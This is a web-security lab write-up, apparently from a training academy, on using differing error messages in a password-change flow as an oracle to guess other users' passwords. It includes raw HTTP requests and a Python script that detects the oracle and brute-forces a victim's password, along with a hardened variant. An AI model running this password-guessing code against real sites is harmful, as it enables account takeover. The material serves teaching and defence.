Brute Force

What is Brute Force

Brute force isn't limited to password guessing. Used strategically, it exploits or amplifies other weaknesses, such as:

  1. Authentication Bypass: Guessing credentials against login mechanisms that lack lockout, rate limiting, or a second factor.
  2. Rate-Limiting Issues: Identifying endpoints that accept unlimited attempts without detection or restriction.
  3. Enumeration: Discovering valid usernames, tokens, or session IDs by analyzing variations in responses.
  4. Hidden Resource Discovery: Brute-forcing directories, files, or endpoints to reveal sensitive resources (e.g., /admin, /backup.zip).
  5. Exploiting Discrepancies Between Requests: When error messages or response behaviors differ based on the input (e.g., whether the old password was valid in a password change flow), brute force can test combinations systematically and turn that difference into an oracle.

Brute force becomes especially potent when combined with other weaknesses, such as response discrepancies or insufficient error handling, that extend the scope of an attack.


Discrepancies Between Requests: Analyzing Password Change Flows

Test the password change flow by sending three variants from your own account and comparing the responses: a valid current password with mismatched new passwords, a wrong current password with matching new passwords, and a wrong current password with mismatched new passwords. If the two mismatched-new-password cases return different errors, the only thing that varied was the validity of the current password, so the endpoint confirms the current password before it checks the new ones. Then alter the username parameter: if the server validates the submitted username's current password instead of the session owner's, the error shifts to a new-password mismatch exactly when the guess is right, which turns the endpoint into a password-guessing oracle for other users (and, where responses also differ for nonexistent accounts, a user-enumeration oracle). Keeping the new passwords mismatched means a correct guess is revealed without ever changing the victim's password.

# Example 1 ---> Valid current password, mismatched new passwords (expect a "new passwords do not match"-style error)

POST /my-account/change-password HTTP/2
Host: lab.web-security-academy.net
Cookie: session=1svjSNn6Uzjw01voAyRV4F9pwBCSsv4B
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8

username=USER&current-password=ABC&new-password-1=123&new-password-2=098
---------------------------------------------------------------------------------
# Example 2 ---> Wrong current password, matching new passwords (expect a "current password is incorrect"-style error)

POST /my-account/change-password HTTP/2
Host: lab.web-security-academy.net
Cookie: session=1svjSNn6Uzjw01voAyRV4F9pwBCSsv4B
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8

username=USER&current-password=NOTABC&new-password-1=123&new-password-2=123

----------------------------------------------------------------------------------
# Example 3 ---> Wrong current password, mismatched new passwords (only the current-password error is returned, no error about the new-password mismatch)

POST /my-account/change-password HTTP/2
Host: lab.web-security-academy.net
Cookie: session=1svjSNn6Uzjw01voAyRV4F9pwBCSsv4B
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8

username=USER&current-password=NOTABC&new-password-1=123&new-password-2=098
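The following script is an added example, not code from the original write-up or from the lab it captures. It automates the three probes above against an account whose password you know, decides whether the mismatched-new-password responses differ only on current-password validity, and if so brute-forces another user's current password through that oracle. The in-memory simulator, its error strings, and the credentials (attacker/ABC, victim/hunter2) are constructed for the demo; a hardened variant sits beside the vulnerable one to show the discrepancy disappearing. The `make_http_sender` helper builds the captured request shape for a real target but is not exercised offline.

```python
# Added example, not part of the original write-up: probe a password-change
# endpoint for the response discrepancy described above and, if present, use
# it as a password oracle for another account. Simulator, error strings and
# credentials are constructed for the demo.
import secrets
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional

# Assumed error strings for the simulator; on a real target read the messages
# from the three baseline probes instead of hard-coding them.
ERR_CURRENT = "Current password is incorrect"
ERR_MISMATCH = "New passwords do not match"
OK_CHANGED = "Password changed"

# A sender submits (username, current_password, new1, new2) and returns the body.
Sender = Callable[[str, str, str, str], str]


class VulnerableChangePasswordApp:
    """Constructed stand-in for the flawed flow: it verifies the current password of
    the *submitted* username (not the session owner) before checking that the two
    new passwords match, so the error returned leaks whether the guess was right."""

    def __init__(self, users: dict):
        self.users = dict(users)  # username -> password, plaintext for the demo only

    def send(self, username: str, current: str, new1: str, new2: str) -> str:
        if self.users.get(username) != current:
            return ERR_CURRENT
        if new1 != new2:
            return ERR_MISMATCH
        self.users[username] = new1
        return OK_CHANGED


class FixedChangePasswordApp(VulnerableChangePasswordApp):
    """Hardened variant: the account comes from the session, not the form, and every
    failure returns one generic message, so the discrepancy disappears."""

    def __init__(self, users: dict, session_user: str):
        super().__init__(users)
        self.session_user = session_user

    def send(self, username: str, current: str, new1: str, new2: str) -> str:
        user = self.session_user  # the form's username field is ignored
        if new1 != new2 or self.users.get(user) != current:
            return "Password change failed"
        self.users[user] = new1
        return OK_CHANGED


def make_http_sender(url: str, session_cookie: str) -> Sender:
    """Sender for a real target using the request shape captured above. The url and
    session cookie are supplied by the caller (assumed values); not run offline."""
    def send(username: str, current: str, new1: str, new2: str) -> str:
        data = urllib.parse.urlencode({
            "username": username, "current-password": current,
            "new-password-1": new1, "new-password-2": new2,
        }).encode()
        req = urllib.request.Request(url, data=data, headers={
            "Cookie": f"session={session_cookie}",
            "Content-Type": "application/x-www-form-urlencoded",
        })
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:  # a 4xx body is still signal
            return err.read().decode(errors="replace")
    return send


def baseline_responses(send: Sender, own_user: str, own_password: str) -> dict:
    """The three probes from the write-up, sent for an account whose password is known."""
    wrong = "NOT" + own_password
    return {
        "valid_current_mismatched_new": send(own_user, own_password, "123", "098"),
        "wrong_current_matching_new": send(own_user, wrong, "123", "123"),
        "wrong_current_mismatched_new": send(own_user, wrong, "123", "098"),
    }


def has_oracle(baseline: dict) -> bool:
    """With the new passwords deliberately mismatched, the only thing that varies is
    whether the current password is right; a differing response is the oracle."""
    return baseline["valid_current_mismatched_new"] != baseline["wrong_current_mismatched_new"]


def guess_password(send: Sender, target_user: str, candidates: Iterable[str]) -> Optional[str]:
    """Brute-force target_user's password through the oracle. The new passwords are
    always mismatched, so a correct guess is reported but the account never changes."""
    # A random, certainly-wrong guess yields this user's 'wrong current password' response.
    wrong_signature = send(target_user, secrets.token_hex(16), "123", "098")
    for candidate in candidates:
        if send(target_user, candidate, "123", "098") != wrong_signature:
            return candidate
    return None
```

Against the simulator, `has_oracle(baseline_responses(app.send, "attacker", "ABC"))` is true for the vulnerable flow and false for the fixed one, and `guess_password(app.send, "victim", wordlist)` recovers the victim's password without modifying it. Against a real endpoint, responses often carry per-request noise (CSRF tokens, timestamps), so compare a stable feature of the body, such as the error string or a status/length pair, rather than the whole response; and note that the hardened flow should still rate-limit attempts, since a generic message removes the oracle but not the guessing.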